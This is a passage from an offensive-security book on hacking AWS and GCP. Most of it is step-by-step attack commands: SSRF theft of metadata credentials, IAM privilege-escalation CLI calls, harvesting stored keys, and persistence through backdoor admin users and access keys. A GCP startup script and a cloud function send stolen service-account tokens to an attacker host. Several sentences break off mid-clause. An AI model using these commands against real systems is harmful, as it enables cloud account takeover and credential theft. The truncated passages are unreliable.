scaling web applications and services developed with Java, .NET, PHP, Node.js,
Python, Ruby, Go, and Docker on familiar servers such as Apache, Nginx, Passenger,
and IIS.
As shown in the above image we have our Python API running on beanstalk. All we
have to do is upload our code and the rest of the deployment cycle is taken care of for
us.
Lambda
Lambda is AWS's serverless computing offering. Serverless computing is a method in
which the cloud provider allocates machine resources on demand, taking care of the
servers on behalf of their customers.
As a programmer all you have to do is write a function and attach a trigger that will
cause your function to be called. This style of development is fairly different from how
traditional applications are built and deployed.
Container Registry
It's common practice for developers to dockerize applications before deploying them. In
the past you would write a program and it would work fine on your computer but it
wouldn't on your friend's. Docker helped solve this issue: if the docker image runs on
your computer it will run on any other computer that has docker installed.
If a company is using docker images they have to store them somewhere, and it's
common to use the Amazon Elastic Container Registry (ECR). Here you can upload your
docker images and pull them down when needed.
Container Orchestration
In today's world it's all about app containerization. Most people use something like
Docker when creating images of their application. Now that you have an image of your
application you need something to deploy and manage it, which is where container
orchestration comes in.
ECS
According to AWS “an Amazon ECS cluster is a regional grouping of one or more
container instances on which you can run task requests". Basically what they are trying
to say is that an ECS cluster runs and manages your containers for you.
What's nice about an ECS cluster is that it takes care of everything for you, once you
create your image just add it to the ECS cluster and you're ready to go. This makes
deploying containers extremely easy.
Kubernetes
ECS is AWS dependent but Kubernetes is the open source equivalent. Kubernetes can
run anywhere, and AWS offers a managed version called the Elastic Kubernetes Service
(EKS).
Similar to ECS all you have to do is upload your application image to your cluster and it
will automatically be deployed. Docker and kubernetes go hand and hand, if a company
is using docker containers they will almost certainly be using something to manage
those containers.
Conclusion
You should now have a basic understanding of a few services AWS offers. However,
there are a hundred other services we didn't go over. If you want to get better at AWS
cloud hacking you need to get better at AWS which means understanding all of the
supplemental material around the various services AWS provides. At the very least you
need to understand the AWS CLI, EC2 instances, S3 buckets, IAM, and the other
services covered in this chapter.
AWS Hacking
Introduction
Now that you have a basic understanding of how AWS works you are ready for the
hacking part. Most of the methodologies and techniques used to hack AWS can be used
on other cloud providers; the only difference is how the attack is pulled off. This chapter will
focus on attacking an AWS environment from start to finish. This book will not talk
about any zero days in AWS, we will be leveraging common misconfigurations and legit
functionalities.
Initial Access
The first step of cloud hacking is getting access to the target's cloud environment. There
are a variety of techniques used to get cloud credentials; you just have to pick the one
that best fits your situation.
SSRF
Server side request forgery (SSRF) is a vulnerability found in web
applications which involves forcing a target server to send HTTP requests to a specified
host on your behalf. The HTTP response will then be shown to the attacker, unless
you're dealing with blind SSRF. If you get SSRF on a server hosted on Amazon Web
Services you can often leverage it to steal cloud credentials from the metadata service.
I'm not going to go over how to perform SSRF here but if you don’t know what SSRF is
I'll explain it a little. SSRF allows an attacker the ability to force an application to send
requests on their behalf. This is often used to access resources on the internal network
or resources that are behind a firewall. Portswigger has a good blog post on SSRF if
you want to learn more technical details on how to exploit this vulnerability:
● https://portswigger.net/web-security/ssrf
As described earlier we know that AWS has something called an EC2 instance that
basically acts as a VPS. A lot of companies use these systems to host web applications.
Sometimes these web applications need access to AWS services so instead of hard
coding credentials developers can utilize the Metadata Service to fetch temporary
credentials for the role attached to the instance:
● https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata
.html
This metadata server can be accessed through the REST API located at
http://169.254.169.254. This endpoint is normally only
accessible to the local machine, but if reached by an attacker it can be used to do all
kinds of things, including stealing credentials.
As stated earlier SSRF is used to force an application to make HTTP requests while
showing the response to the attacker. Note the attacker must be able to view the
response for this attack to work.
If an application is hosted on an AWS EC2 instance the metadata API can be queried to
extract credentials for the roles attached to the instance. These
credentials could then be used to do all kinds of things depending on their permissions.
Sending a GET request to the following endpoint will dump a list of roles that are
● http://169.254.169.254/latest/meta-data/iam/security-credentials/
Once you get a list of roles attached to the EC2 instance you can dump their credentials
via the following endpoint:
● http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE_NAME_HERE>
You can then take those credentials and use them with the AWS CLI. This will allow you
to do anything that role has permissions to do. If the role has improper permissions set
(most likely) you will be able to do all kinds of things; you might even be able to take
over the entire cloud environment.
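A sketch of plugging stolen metadata credentials into the CLI via environment variables; the values come from the security-credentials response above:
● export AWS_ACCESS_KEY_ID=<AccessKeyId>
● export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
● export AWS_SESSION_TOKEN=<Token>
● aws sts get-caller-identity
The sts get-caller-identity call is a quick way to confirm the credentials work.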
This has been heavily abused in the wild by attackers and a while back AWS introduced
IMDSv2 which works a little differently and helps prevent certain types of SSRF from
● https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-m
etadata-service.html
People thought that this was going to be the end of leveraging SSRF to compromise
cloud accounts. However, Amazon has stated that “Both IMDSv1 and IMDSv2 will be
available and enabled by default, and customers can choose which they will use”. This
means the insecure version IMDSv1 isn't going away anytime soon as it's enabled by
default.
Source Code
Developers love hard coding credentials into their applications as it makes their life
easier. This is always bad, unless you are an attacker, then it's good for you. If you have
access to a target's source code, search it for credential strings like the one below:
● {"aws_access_key_id":"AKIXXX55XXXXXXUCMXXX","aws_secret_access_
key":"I80tXXXZWXXXVO73ezzXXXXXXXQ6bvPXXX5XXXsl"}
If you're looking at source code you will typically want to look for AWS specific libraries
and imports. For example if you see a python application importing ‘boto3’ then you can
assume they are interacting with AWS so they must be passing their credentials
somehow.
Hard coded passwords are an easy way of breaking into a target's cloud environment.
Environment Variables
Another common spot for storing AWS credentials is in environment variables. Most
experienced developers know that hard coding passwords is a bad idea. However, you
have to pass credentials to your application somehow and I often see people using
environment variables.
It's always a good idea to check environment variables. You might just get lucky.
CLI
If you compromise a host where users are interacting with AWS via the CLI you can
steal their credentials from the following file:
● ~/.aws/credentials
As shown above the CLI saves its credentials in the ~/.aws/credentials file. Once you
have these credentials you can interact with AWS as that user.
Phishing
If all else fails you can always trust a good phishing email to get the job done. However,
you will have to identify the right users to send the phishing email to, create a fake AWS
login page, and send out the emails.
I won't go into the details of phishing as all of that is out of the scope of this book.
However, if you are interested in this topic there are plenty of blogs and videos that
cover it in depth.
Privilege Escalation
Once you have access to a cloud user you need to see if you can escalate your
privileges. In the cloud privilege escalation is done via the IAM and is typically caused
by users having certain permissions set. In AWS there are 21 publicly known IAM
permission based privilege escalation techniques, documented by Rhino Security Labs:
● https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
iam:CreatePolicyVersion
The iam:CreatePolicyVersion permission lets you push a new version of an existing
policy. If you have a policy attached to your user you can change the "Action" to "*" and
the "Resource" to "*", which would give you access to everything as shown below:
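A sketch of the malicious policy document, saved locally as policy.json for the command that follows:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}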
Finally you can use the following command to update your policy giving you admin level
access:
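A sketch of the command; the policy ARN is a placeholder for the policy attached to your user:
● aws iam create-policy-version --policy-arn <policy arn> --policy-document file://policy.json --set-as-default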
iam:SetDefaultPolicyVersion
If an administrator accidentally gave a policy too many privileges they might update the
policy to remove those privileges. AWS keeps the old versions of the policy, and a user
with the iam:SetDefaultPolicyVersion permission
can pick which version of the policy is active. This allows the user to potentially escalate
their privileges by activating an old version of a policy with higher permissions. For
example if version 1 of a policy has higher permissions than version 2 we could rollback
the policy to version 1 giving that user higher permissions as shown below:
● aws iam set-default-policy-version --policy-arn arn:aws:iam::1231124:policy/VulnerablePolicy --version-id v1
iam:PassRole & ec2:RunInstances
If a user has the PassRole and RunInstances permissions they can escalate privileges
to another role. The PassRole permission allows a user the ability to pass a role to
another AWS resource. Remember a role can be thought of as a user that resources
such as machines can utilize and has its own sets of permissions attached to it. Next,
the RunInstances permission allows the user to spin up new EC2 instances.
First you need to find a role you want to escalate to. Once you have the target role you
need to spin up an EC2 instance with the target role attached. Finally SSH into the EC2
instance and query the metadata service to steal the target's AWS token. Use the
following command to create the EC2 instance with the target role “admin” attached:
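A sketch of the command; the AMI id, key name, and instance profile are placeholders (the profile must wrap the "admin" role):
● aws ec2 run-instances --image-id <ami id> --instance-type t2.micro --iam-instance-profile Name=admin --key-name <your key>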
It may take a few minutes for the instance to spin up, but once it does you can SSH into
it and hit the metadata service as shown above. Once you have the target role's token
you can use it to act as that role.
iam:CreateAccessKey
The iam:CreateAccessKey permission can be used to create access keys for other
users. Access keys act as credentials and can be used to issue commands as the user.
If the resource section of the policy is set to "*" while having this permission set, we can
create access keys for any user, including administrators, as sketched below:
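A sketch of the command targeting a hypothetical "admin" user:
● aws iam create-access-key --user-name admin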
As shown above we created an access key for the admin user. All we have to do is plug
the new keys into the AWS CLI and we can act as that user.
iam:CreateLoginProfile
The iam:CreateLoginProfile permission lets you set a console password for a user
who doesn't have one set already. Having this permission allows an attacker the ability
to create a password for the target which can be used to login via the console:
● aws iam create-login-profile --user-name <target user> --password '<password>' --no-password-reset-required
iam:UpdateLoginProfile
The iam:UpdateLoginProfile permission is similar, except it lets you change the existing
password for a user. The only difference is that the user must already have a console
password set:
● aws iam update-login-profile --user-name <target user> --password '<password>' --no-password-reset-required
iam:AttachUserPolicy
The iam:AttachUserPolicy permission gives users the ability to attach policies to users. If
this permission is attached to your user you could potentially attach the AWS managed
AdministratorAccess policy to your account giving you admin permissions to the cloud
environment.
● aws iam attach-user-policy --user-name <your user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
iam:AttachGroupPolicy
This permission works the same as iam:AttachUserPolicy,
except you attach the policy to a group instead of a user. Just make sure you're a part of
the group you attach the policy to:
● aws iam attach-group-policy --group-name <your group> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
iam:AttachRolePolicy
This permission works the same as iam:AttachUserPolicy
and iam:AttachGroupPolicy, except you attach the policy to a role. Just make sure your
user is able to assume that role:
● aws iam attach-role-policy --role-name <role name> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
iam:PutUserPolicy
This permission allows you to create or update an inline policy. If this permission is set,
an attacker could leverage it to add an inline policy granting admin level access as
shown below:
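A sketch of the inline policy document, saved as admin_policy.json for the commands that follow:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}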
Next use the following command to add that to the target user as an inline policy. Once
executed that user should have admin level access to the cloud environment.
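A sketch of the command; the user and policy names are placeholders:
● aws iam put-user-policy --user-name <target user> --policy-name admin_policy --policy-document file://admin_policy.json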
iam:PutGroupPolicy
This policy is very similar to the iam:PutUserPolicy permission except this allows you to
add/update inline policies to groups instead of users. Again you need to create a policy
that has admin level access and add it as an inline policy to a group your user has
access to.
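The group variant might look like the following sketch:
● aws iam put-group-policy --group-name <your group> --policy-name admin_policy --policy-document file://admin_policy.json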
iam:PutRolePolicy
This permission works the same way; the
only difference is that this lets you add/update an inline policy for a role. Create an
admin level policy and add it to a role your user can assume:
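A sketch of the role variant:
● aws iam put-role-policy --role-name <role name> --policy-name admin_policy --policy-document file://admin_policy.json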
iam:AddUserToGroup
This permission allows you to add users to groups. This can be abused by an attacker
by adding their user to a group that has higher permissions. If there is a group with
admin level permissions try adding your user to it; if successful your user should also
have admin level permissions:
● aws iam add-user-to-group --group-name <admin group> --user-name USER_NAME
Enumeration
Once you have access to a cloud account you need to figure out what resources your
user has permissions to interact with. AWS has hundreds of services so we can't cover
everything but you should at least be familiar with the basic ones.
S3 Buckets
I'm sure you have heard of S3 buckets but if you haven't it is a public cloud storage
resource used to store files and other objects. As an attacker this is definitely something
you want to look for as it has the potential to house sensitive data.
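A sketch of listing all buckets with the CLI:
● aws s3 ls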
As shown above we are able to list all the S3 buckets in the cloud environment.
However, in some cases you may have access to an S3 bucket but be missing the
permission or policy necessary to list the names of S3 buckets. In that case you would
have to be able to guess or bruteforce the name of the S3 bucket you have access to.
Once you know the name of an S3 bucket you can view its contents by issuing the
following command:
● aws s3 ls YOUR_BUCKET
This will list out all the files and folders in your bucket. To download a file you can issue
the following command:
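A sketch of the download; the bucket and file names are placeholders:
● aws s3 cp s3://YOUR_BUCKET/file.txt .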
As shown above we are downloading the text file "file.txt" to our local system. You could
also upload files to the bucket by reversing the source and destination arguments.
Virtual Machines
AWS has several types of virtual machines but the most popular one is the Elastic
Compute Cloud(EC2). You can use Amazon EC2 to launch as many or as few virtual
servers as you need, configure security and networking, and manage storage.
As shown in the image above the aws ec2 describe-instances command returns a list
of EC2 instances and their related information such as its IP address, instanceid, name,
and much more. The above returns a lot of information but you can filter down the
output using the built in JSON parser via the --query argument:
● aws ec2 describe-instances --query "Reservations[*].Instances[*].{PublicIP:PublicIpAddress,Name:Tags[?Key=='Name']|[0].Value,Status:State.Name}"
As you can see in the image above the returned results are much easier to read. EC2
instances are used to run all kinds of things such as websites, databases, kubernetes
clusters, and much more.
Databases
Databases hold all kinds of interesting things such as usernames and passwords. Depending on
the technical requirements there may be several different kinds of databases running in
an environment.
AWS has services to handle everything but we will focus on the “Amazon RDS” service
which is hosting a MySql database. To get a list of the running databases run the
following command:
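A sketch of the RDS enumeration command:
● aws rds describe-db-instances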
As you can see above we get some information about each of the running databases.
One of the fields returned is the address and root user. If the address is a publicly facing
URL you could use that with the root user to launch a brute force attack.
Depending on your permissions you may be able to reset the master password. This can
be done with the "modify-db-instance" subcommand, as sketched below.
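The instance identifier and password here are placeholders:
● aws rds modify-db-instance --db-instance-identifier <instance id> --master-user-password <new password> --apply-immediately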
After you reset the master password you can login to the database and download
everything. However, changing the root password will definitely set off the alarms and
you may break any applications using that account, so be careful when doing this.
Elastic BeanStalk
AWS Elastic Beanstalk (EBS) is an easy-to-use service for deploying and scaling web
applications and services developed with Java, .NET, PHP, Node.js, Python, Ruby, Go,
and Docker on familiar servers such as Apache, Nginx, Passenger, and IIS. This means
we can use EBS to easily deploy applications with the click of a button or a shell
command.
Typically you will see the front end or an API deployed to a beanstalk environment.
These environments can be enumerated with the CLI as sketched below.
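One of the fields returned by this command is EndpointURL:
● aws elasticbeanstalk describe-environments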
I would take special note of the “EndpointURL” variable. This will have a public url
pointing to the application hosted by EBS. Once you have this endpoint you can launch
further attacks against that application such as looking for OWASP top 10 vulns if it is a
web application.
Another interesting thing about EBS is that it will deploy the application to an EC2
instance from the source code contained in an S3 bucket. When we press the deploy
button it takes our source code and saves it to a S3 bucket then it is deployed to a
virtual machine from that file. This means we should be able to find the source code of
all EBS applications in an S3 bucket. Anyone who has access to that S3 bucket will also
have access to the application's source code.
As you can see in the image above there is indeed an S3 bucket with the name of
"elasticbeanstalk-<region>-<account id>".
If you issue the ls command on that s3 bucket you should see a bunch of .zip files.
These zip files contain the source code for the applications deployed to beanstalk. The
next step is to download these files and analyze the source code for hardcoded
credentials and other sensitive information.
Persistence
New User
One of the easiest ways to backdoor a cloud environment is to create a new user who has full access to that environment. As shown below, you can use the "aws iam create-user" command to do this. Once you have this user created you should give them a console password and put them in a group with the highest privileges. This can be done with the following commands:
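A minimal sketch; the user and group names are placeholders, pick a privileged group that already exists in the target account:
● aws iam create-user --user-name backdoor-user
● aws iam create-login-profile --user-name backdoor-user --password 'My!User1Login8P@ssword'
● aws iam add-user-to-group --user-name backdoor-user --group-name admins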
Access Keys
If a user changes their password you won't be able to access that user anymore. However, any access keys that user has will still be active and valid. If you have the right permissions you can create an access key for any user. This can be done with the following command:
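● aws iam create-access-key --user-name <USERNAME>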
Now that you have an access key you can use it with the AWS CLI to interact with the cloud environment as that user, even if they later rotate their password.
Conclusion
AWS is huge, so we could only cover the basics of AWS hacking, but the basics will still put you way ahead of the pack, and for 90% of cloud environments the basics are all you need. You know the most popular initial compromise methods, you know how to escalate privileges, you know what services have juicy information, and you know how to persist in an AWS cloud environment. If you want to take things to the next level I recommend reading more books, blogs, and videos on the topic, there is a lot of material out there.
GCP Hacking
Introduction
Google Cloud Platform (GCP) is the third most popular cloud computing platform out there. Most of the services in GCP are similar to AWS and other platforms, but there are a few differences.
The structure of a GCP account starts at the organization, which will be the same as your domain name, so if you attach a domain called "example.com" your organization's name will be "example.com". Below the organization sit folders, which can be made up of other folders and projects. Lastly there are projects, which are where everything lives. Note if a domain is not attached to GCP you will only have projects available to you.
When signing into GCP a project will look something like the following:
As you can see above we are in a project called "test-project"; there is 1 compute engine instance running, 4 storage buckets, and 1 SQL instance running. All of your infrastructure will be created within a project, and you will also find users and their permissions in here.
A typical organization will have many projects, for example they might have one project for the dev environment, one for testing, and another for production. Also, users can be a part of multiple projects, so if you compromise a cloud account you should always look to see which projects they have access to, this will allow you to move laterally in a cloud organization.
IAM
IAM is the service that decides what resources members have access to. In GCP a member can be one of the following:
● User
● Service Account
● Group
● Organization
Roles are applied to members and are used to dictate what services they can interact with. Each role will have a set of permissions which determine exactly what a user has access to. All of these settings are wrapped up in a policy, which is used to dictate who can do what in a project.
User Accounts
There are two types of members in GCP, one is a human and the other is a machine. Machines typically use service accounts and humans will use their gmail or domain accounts:
● User
● Service Account
Any machine you spin up or cloud function you create will have a service account attached to it. This is how the instances are able to interact with the rest of GCP. For example, if you spin up a virtual machine and want it to have access to your storage bucket, it needs a way of doing this, and the solution is to use a service account to grant that access.
Roles
Roles are attached to members and each role is made up of a collection of permissions. These permissions dictate exactly what a member can and can't do on GCP. There are three types of roles:
● Basic
● Predefined
● Custom
When looking at permissions, always be on the lookout for basic AKA primitive roles. There are three types of primitive roles, and they give access to way more than is typically needed:
● Primitive Roles
○ Owner
■ This is the big one, it gives full access to everything.
○ Editor
■ This lets you view and modify nearly everything.
○ Viewer
■ This is a little less exciting, basically it lets you view anything but not modify it.
Every project also comes with a default compute engine service account which holds the role of editor. This service account is used by default when spinning up virtual machines, which means if we can compromise this service account we get instant admin level access.
You can also see the roles "security reviewer", "service usage admin", and "stackdriver accounts viewer". These are predefined roles which GCP has already set up with predefined permissions. Lastly you can see the role "priv_esc_role", which is a custom role made by the admin, and it can contain any number of permissions in it.
The above image shows that the editor role has 3,098 permissions assigned to it, spanning nearly every different service. Roles and permissions will play a big part when attempting privilege escalation.
Compute Engine
Introduction
The compute engine is where you create and interact with your virtual machines. If your organization heavily uses the cloud you could have hundreds of instances running in your environment.
When creating these virtual machines you must attach a service account so the machine can interact with the rest of GCP.
By default it will use the compute engine default service account, which as we saw earlier holds the editor role. When using this default account you must also specify its access scopes. Access scopes limit which API calls you can make, so even though you have an editor role you might still have limited permissions because of your scope. If the scope is set to "Allow full access to all Cloud APIs" these restrictions are removed and you will have access to everything. This will come up later when we talk about SSRF. Note that scopes only apply to the default service account; all other service accounts rely purely on your IAM roles.
Metadata
So our instance has a service account linked to it, but how does it use this account? To use the service account it needs its credentials, and these credentials can be found via the metadata service:
● http://169.254.169.254/computeMetadata/v1beta1/instance/service-accounts/default/token
● http://169.254.169.254/computeMetadata/v1beta1/project/project-id
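Pulling the token from inside the instance is a one-liner; the v1beta1 endpoint is used here because, at the time of writing, it does not require the custom metadata header:
● curl http://169.254.169.254/computeMetadata/v1beta1/instance/service-accounts/default/token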
As shown above, hitting the metadata server gets us the service account's access token. We can then utilize this access token to authenticate to Google's APIs, which allows us to issue commands to the GCP environment.
Authenticating
Gcloud and Gsutil are both command line tools created by Google; these tools are perfect when you have access to service account keys. However, there are times when you only have access to a temporary access token. In that case you will have to use the Google API or SDK. An example Google API call can be found below:
"https://storage.googleapis.com/storage/v1/b?project=PROJECT-HERE"
Depending on what service you are trying to call you will have to modify the endpoint
you send your request to. Other than that you just place your access token in the
If your want to use your access token with the Google SDK it will look something like:
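A minimal sketch using the Python client libraries; the token is whatever you pulled from the metadata service, and "PROJECT-HERE" is the target project id:

import googleapiclient.discovery
from google.oauth2.credentials import Credentials

# Wrap the raw OAuth access token in a credentials object
creds = Credentials(token="<ACCESS-TOKEN>")

# Build a client for the service you want to hit, storage in this case
storage = googleapiclient.discovery.build("storage", "v1", credentials=creds)

# List the buckets in the target project
print(storage.buckets().list(project="PROJECT-HERE").execute())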
Initial Access
SSRF
You should already know how to exploit SSRF from the AWS hacking chapters so I won't cover it again here, as the process is the same. The only difference is the metadata endpoint you target:
● http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Be aware that if V2 is enabled you will also have to send a custom header, as shown in the example below:
● "Metadata-Flavor: Google"
Source Code
There are a few types of credentials you could find in an application's source code. The first type is an API key. As shown below, your application would have to make an HTTP request with the key appended to the URL:
● https://language.googleapis.com/v1/documents:analyzeEntities?key=API_KEY
If you're looking at source code, grepping for "googleapis.com" could reveal strings containing hardcoded API keys.
In addition to API keys you can also use a JSON file containing credentials. Instead of hard coding credentials you hard code a path to a file that contains the credentials. If you have ever used the Python SDK you may have seen a function like from_service_account_json(). If you're auditing a python script and ever see that function being called you should try to access the json file that is passed to it, as it holds credentials. Other languages have similar functions.
Environment Variables
Another place to find credentials is in environment variables. As shown in the below image, the credentials are stored in a json file and the path to that file is placed into the GOOGLE_APPLICATION_CREDENTIALS environment variable. Once you have access to this JSON file you have access to the user's credentials.
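For reference, the variable is typically set like this:
● export GOOGLE_APPLICATION_CREDENTIALS="/path/to/service-account.json"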
Phishing
When all else fails try phishing. If you know the emails of people on the GCP project you can target them with a phishing campaign to steal their credentials.
Most engagements prohibit phishing attacks. However, red teaming and social
engineering engagements typically have this attack vector in scope so it's still good to
know.
Privilege Escalation
IAM Permissions
The vast majority of privilege escalation techniques revolve around members' roles and permissions. Some permissions grant special rights which can be leveraged by an attacker. To get a full understanding of these permissions and how they can be exploited, check out the detailed blog posts by Rhino Security Labs where they highlight these privilege escalation techniques:
● https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
● https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/
Deploymentmanager.deployments.create
If you have this permission you could abuse it to create a compute instance, add a startup script that gathers the service account's access token via the metadata service, and finally sends it back to the attacker.
The first step is to create the YAML file used to set up the compute engine instance.
Notice the startup script makes a curl request to the metadata service, then takes the response and sends it to the attacker's computer. This config file can be found below:
resources:
- name: vm-created-by-deployment-manager
  type: compute.v1.instance
  properties:
    zone: us-central1-a
    machineType: zones/us-central1-a/machineTypes/n1-standard-1
    disks:
    - deviceName: boot
      type: PERSISTENT
      boot: true
      autoDelete: true
      initializeParams:
        sourceImage: projects/debian-cloud/global/images/family/debian-9
    networkInterfaces:
    - network: global/networks/default
      accessConfigs:
      - type: ONE_TO_ONE_NAT
    metadata:
      items:
      - key: startup-script
        value: |
          #!/bin/bash
          apt-get update
          # grab the token and ship it to the attacker (the domain is a placeholder)
          curl "http://<ATTACKER-DOMAIN-HERE>/?token=$(curl http://169.254.169.254/computeMetadata/v1beta1/instance/service-accounts/default/token)"
    serviceAccounts:
    - email: default
      scopes:
      - https://www.googleapis.com/auth/cloud-platform
Next you create the deployment, and with it the compute engine instance, using the deployment manager command shown below:
● gcloud deployment-manager deployments create <DEPLOYMENT-NAME> --config <CONFIG-FILE-NAME>.yaml
Once the compute engine is spun up you should receive a callback containing the newly created instance's service account token.
Iam.roles.update
This permission allows you to add additional permissions to a custom role. If you have a custom role applied to your account you could add additional permissions to that role, escalating your own privileges:
● gcloud iam roles update <ROLE-ID> --project=<PROJECT-ID> --permissions=<PERMISSION-1>,<PERMISSION-2>
Note, updating a custom role will overwrite any existing permissions in that role, so include the old ones along with the new. For example, adding the iam.serviceAccountKeys.create permission to your role allows you to create service account keys for other users.
iam.serviceAccounts.getAccessToken
This permission allows you to request a temporary access token for another service account, letting you act as the victim. Unfortunately I couldn't find a gcloud cli command to do this, but we can use the Google API directly:
● curl -X POST -H "Authorization: Bearer <YOUR-ACCESS-TOKEN>" -H "Content-Type: application/json" -d "{ 'scope': [ 'https://www.googleapis.com/auth/iam', 'https://www.googleapis.com/auth/cloud-platform' ] }" https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/<TARGET-SERVICE-ACCOUNT>:generateAccessToken
iam.serviceAccountKeys.create
The previous technique hands out temporary tokens, but this permission allows you to create permanent keys which are attached to a service account:
● gcloud iam service-accounts keys create key.json --iam-account=IAM_ACCOUNT
iam.serviceAccounts.actAs
This permission allows you to create resources using another service account. For
example if you wanted to create a compute instance and attach another service account
to that VM you would need this permission along with the permission to create VMs.
More examples can be found in the subsections below, which require this permission to work.
Cloudfunctions.functions.create
To pull off this technique you need the following set of permissions:
● iam.serviceAccounts.actAs
● Cloudfunctions.functions.create
● Cloudfunctions.functions.sourceCodeSet
● Cloudfunctions.functions.call
Here we are creating a cloud function that runs as another service account; when called, it grabs that service account's access token and sends it to the attacker's machine. A sketch of the deploy command follows.
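The function name and source directory below are placeholders, and the function body would be the same token-stealing snippet shown later in the persistence section:
● gcloud functions deploy exfil-func --runtime python37 --trigger-http --service-account <TARGET-SERVICE-ACCOUNT-EMAIL> --source <SOURCE-DIR>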
Rhino Security Labs also created a tool which can be used to search for and exploit
these misconfigurations:
● https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
To use this tool you must have a valid access token and project id. Access tokens and project ids can be retrieved in many ways, but one of the most popular is via SSRF. The first step is to enumerate your member's permissions:
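Something like the following; the script name is taken from the repo, double check its README as the tooling evolves:
● python3 enumerate_member_permissions.py -p <PROJECT-ID>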
Note that if you don't have the right permissions the command will fail and you won't be able to check for privilege escalation automatically; however, you could take the brute force approach and just manually try all the exploits by hand until one works.
If you do have the correct permissions the command will run and save everything to a folder. The next step is to run the "python3 check_for_privesc.py" command. This
will check for all the possible ways you can compromise other accounts given the permissions you hold. To actually run the exploits you need to move to the exploits folder. Then you just pick your exploit, edit the python file with your details, and run the script.
One of my favorite things to do is create service account keys for other accounts; if successful, this allows you to log in as that service account, which is great for lateral movement.
As you can see in the above source code we need to put in the project id and our target service account. After that, run the script; it will ask for your access token, and once it completes it will create and output the target service account's key.
Next you have to base64 decode the "privateKeyData" value, which should present you with a json blob. This json blob is your credentials. Once you have the credentials you can use them to authenticate with gcloud:
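A minimal sketch, assuming you saved the decoded json blob to key.json:
● gcloud auth activate-service-account --key-file=key.json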
If the user has higher privileges than us then we just performed privilege escalation; if they don't then we can use this for lateral movement. In addition, we can use this same technique for persistence, as described later in the chapter. As you can see above, we created a user managed key under the "Compute Engine default service account".
This is just an example of one of the exploits available to us; there are many more techniques we can use for privilege escalation and lateral movement, just look at the rest of the exploit scripts in the repo.
Enumeration
When you get access to a cloud account one of the first things you need to determine is what services you have access to. Depending on your permissions this can be straightforward or slightly harder. If you have any of the primitive roles of owner, editor, or viewer you probably have all the permissions you need to discover everything in the cloud environment; just use Gcloud, Gsutil, the Google SDK, or the Google APIs and start querying things.
Tools
There are several tools that can be used in this phase as shown below:
● Gcloud
● Gsutil
● Google API
Buckets
Buckets are used to hold files; these files can include logs, credentials, source code, or anything else you would consider sensitive. Most organizations know not to store sensitive information in public buckets, but private buckets are typically fair game. The first thing you need to do is get a list of all buckets the user has access to. If we have permissions to list buckets we can use the gsutil tool to do this for us. Note this requires a service account key or account credentials; access tokens and API keys will not work here:
● gsutil ls
If you only have an access token you can query the google api directly with the following command:
● curl -H "Authorization: Bearer <ACCESS-TOKEN>" "https://storage.googleapis.com/storage/v1/b?project=PROJECT-HERE"
Once you have a list of buckets you can start seeing what's in them. There's no telling what hidden gems you can uncover by pillaging a cloud storage bucket. People store all kinds of things in here like credentials, encryption keys, and anything else that would be considered sensitive. During the discovery phase you should have uncovered any buckets in your target GCP environment; now is the time to look around to see what you can find.
● gsutil ls gs://STORAGE_BUCKET_NAME
You can also dump the contents of a file with the "cat" command:
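● gsutil cat gs://STORAGE_BUCKET_NAME/<FILE-NAME>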
Note this was an rtf file, that's why you see all the weird encoding. Normally I would just pipe this to a file and open it up locally. You can also copy an entire bucket over to your local machine:
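● gsutil cp -r gs://STORAGE_BUCKET_NAME .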
I like this approach as I can analyze everything on my local machine instead of sending hundreds of commands to GCP. I would just copy over every storage bucket you have access to and dig through them offline.
Instances
Chances are that your target cloud environment is running multiple virtual machines. It’s
a good idea to map out your environment to see what machines are running and which
ones you have access to. This can be done using gcloud as shown below:
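● gcloud compute instances list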
You can also use the compute google api to pull this information if you only have an
access token.
Databases
Databases are always a gold mine if you can extract the information off of them. If your target cloud environment is running any kind of web application it probably has a database storing all the user information. You can use gcloud and the google APIs to find these instances as shown below:
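● gcloud sql instances list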
KMS
When you store things on GCP (storage buckets) you can either store them in plain text or you can encrypt them with a key. These keys are stored in the Key Management Service (KMS). If you have access to a key you can then use it to decrypt sensitive files:
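Keyrings live in a location, so listing keys is a two step process:
● gcloud kms keyrings list --location global
● gcloud kms keys list --keyring <KEYRING-NAME> --location global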
Images
When you create a compute engine virtual machine you have the option to upload your own custom image for the machine to run from. It's a good idea to figure out where these images are so we can later download them and see what secrets are on them:
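The --no-standard-images flag hides Google's public images so only the project's custom ones show:
● gcloud compute images list --no-standard-images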
Containers
DevOps has become increasingly popular over the years and containerizing your application has become the norm. These docker containers need a place to be stored and that's where the container registry comes in. Getting a list of docker images, as shown below, can be very helpful later down the road when you decide to download them and see what secrets you can extract. In addition to that you can also backdoor these containers. Both of these techniques were described earlier in the book in the Docker Hacking chapters; if you want to learn more about container hacking refer to those chapters.
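● gcloud container images list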
Kubernetes
Unlike on other cloud platforms, kubernetes seems to be really popular among GCP users. It's generally a good idea to see what kubernetes clusters are available to you. This can be done with the following command:
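● gcloud container clusters list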
We won’t cover kubernetes hacking again because it was covered earlier in the book. If
you want to learn more about kubernetes hacking refer to those chapters.
You can gather all this information by hand or you can use a script to get everything for you. I personally like to do things manually, but if I'm in a rush, feeling lazy, or don't have access to a service account key I'll take this approach. You can download the tool from the link below:
● https://github.com/NotSoSecure/cloud-service-enum
What's nice about this tool is that it takes an access token and not a service account key. So if you got SSRF which returns an access token but can't get a service account key, no problem. Another nice feature of this tool is that it brute forces every service to determine what you can access, so even if you don't have permissions to list services it will still find them. To run the tool you must have an access token and a project id:
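Something along these lines; the script name and flags come from the repo and may change, so check its README:
● python3 gcp_enum.py --access-token <ACCESS-TOKEN> --project-id <PROJECT-ID>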
